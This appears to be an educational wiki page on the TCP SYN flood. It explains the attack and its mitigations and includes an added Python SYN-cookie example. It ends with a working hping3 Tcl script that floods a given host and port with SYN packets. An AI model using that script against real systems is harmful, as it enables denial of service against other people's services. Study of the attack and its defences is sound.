The SYN flood is an attack that can nowadays be considered archaic, although the general idea still works
(as one component of a DDoS, for instance). The goal of the attack is to send TCP connection requests faster
than a machine can process them, saturating its resources so that it can no longer accept new connections.
The attacker does not complete a whole TCP connection: it only sends SYN packets (the first packet of the
TCP three-way handshake), spoofing the source IP address at random, so from the attacker's point of view the
only resource the attack consumes is bandwidth, since no state has to be kept. The victim, instead, has to
keep a half-open connection for every SYN it receives until it times out. Modern operating systems handle
these resources better than in the past, or use cryptographic techniques (SYN cookies, RST cookies) to
mitigate the problem: the server encodes the connection parameters in its initial sequence number and
allocates memory only when the third packet of the handshake (the client's ACK) comes back carrying that
value. Still, the attack can cause trouble. A simpler countermeasure, somewhat effective and yet very easy
to implement, is to drop a half-open connection at random when there are too many of them pending.
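The SYN-cookie idea described above, as an added example that is not part of the original page and not hping3 code: the server derives its initial sequence number from a keyed hash over the connection 4-tuple, the client's ISN, a coarse time counter and an MSS index, stores nothing, and only trusts the third packet if the ACK number reproduces that value. The 5/3/24-bit layout, the MSS table, the two-slot window and the secret key are assumptions chosen for illustration; real stacks use a similar but not identical layout.

```python
"""Minimal stateless SYN-cookie handshake (added example, not hping3 code)."""
import hashlib
import hmac
import ipaddress
import struct

# MSS values the cookie can encode in 3 bits (index into this table).
# Assumed table for the example; real stacks use a similar small table.
MSS_TABLE = (536, 1300, 1440, 1460)
TIME_WINDOW = 2  # how many 64-second slots a cookie stays acceptable (assumption)


def _time_slot(now):
    """Coarse time counter: one slot per 64 seconds, kept to 5 bits."""
    return (int(now) // 64) & 0x1F


def _mac24(key, saddr, daddr, sport, dport, client_isn, slot, mss_idx):
    """24-bit keyed hash over the 4-tuple, client ISN, time slot and MSS index."""
    msg = struct.pack("!4s4sHHIBB",
                      ipaddress.IPv4Address(saddr).packed,
                      ipaddress.IPv4Address(daddr).packed,
                      sport, dport, client_isn & 0xFFFFFFFF, slot, mss_idx)
    digest = hmac.new(key, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def mss_index(mss):
    """Index of the largest table entry not exceeding the client's MSS."""
    idx = 0
    for i, value in enumerate(MSS_TABLE):
        if value <= mss:
            idx = i
    return idx


def make_syn_cookie(key, saddr, daddr, sport, dport, client_isn, mss, now):
    """Server ISN for the SYN-ACK: 5-bit time slot | 3-bit MSS index | 24-bit MAC.
    Nothing is stored on the server; the cookie itself carries the state."""
    slot = _time_slot(now)
    idx = mss_index(mss)
    mac = _mac24(key, saddr, daddr, sport, dport, client_isn, slot, idx)
    return (slot << 27) | (idx << 24) | mac


def check_syn_cookie(key, saddr, daddr, sport, dport, ack_seq, ack_ack, now):
    """Validate the third packet (the ACK). Returns the recovered MSS, or None if
    the cookie is stale or its MAC does not match; only then is state allocated."""
    cookie = (ack_ack - 1) & 0xFFFFFFFF
    client_isn = (ack_seq - 1) & 0xFFFFFFFF
    slot = cookie >> 27
    idx = (cookie >> 24) & 0x7
    if ((_time_slot(now) - slot) & 0x1F) > TIME_WINDOW:
        return None
    expected = _mac24(key, saddr, daddr, sport, dport, client_isn, slot, idx)
    if not hmac.compare_digest(expected.to_bytes(3, "big"),
                               (cookie & 0xFFFFFF).to_bytes(3, "big")):
        return None
    return MSS_TABLE[idx]


def demo():
    """Constructed handshake: one honest client, one forged ACK, one stale ACK."""
    key = b"per-boot-secret"  # constructed; a real stack rotates this
    saddr, daddr, sport, dport = "203.0.113.7", "192.0.2.10", 40000, 80
    client_isn, mss, t0 = 0x11223344, 1460, 1_700_000_000

    # Honest client: SYN -> SYN-ACK(cookie) -> ACK(seq=isn+1, ack=cookie+1).
    cookie = make_syn_cookie(key, saddr, daddr, sport, dport, client_isn, mss, t0)
    ok = check_syn_cookie(key, saddr, daddr, sport, dport,
                          client_isn + 1, cookie + 1, t0 + 10)

    # Spoofed SYN: the SYN-ACK went to a host that never answers, so no ACK arrives
    # and nothing was allocated. An attacker guessing the ACK fails validation.
    forged = check_syn_cookie(key, saddr, daddr, sport, dport,
                              client_isn + 1, 0xDEADBEEF, t0 + 10)

    # An ACK replayed after the time window has passed is rejected as well.
    stale = check_syn_cookie(key, saddr, daddr, sport, dport,
                             client_isn + 1, cookie + 1, t0 + 64 * 5)
    return ok, forged, stale


if __name__ == "__main__":
    print(demo())
```

The point of the layout is that a flood of spoofed SYNs costs the server one hash per packet and no memory: the half-open state the attack relies on simply does not exist, and the MSS the server needs later is recovered from the cookie bits rather than from a stored entry.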
This wiki is nothing without code, so here is the attack as an hping3 Tcl script (save it as a .htcl file):
# (c) GPL2 fluxist(at)gmail.com
# Usage: hping3 exec ./synflood.htcl <hostname> <dstport>
if {$argc < 2} {
    puts "Required arguments: hostname dstport"
    exit 1
}
foreach {hostname port} $argv break
set srcport 14000
# Resolve the victim and pick the address of the interface that routes to it.
set target [hping resolve $hostname]
set myaddr [hping outifa $target]
puts "Synflooding $target..."
# Send bare SYNs as fast as the interpreter allows. No reply is ever read, so the
# attacking side keeps no state. Note that this script uses our own address as
# source (saddr=$myaddr), so the victim's SYN-ACKs come back to us; the random
# source spoofing described above would need a different saddr for each packet.
while {1} {
    hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
}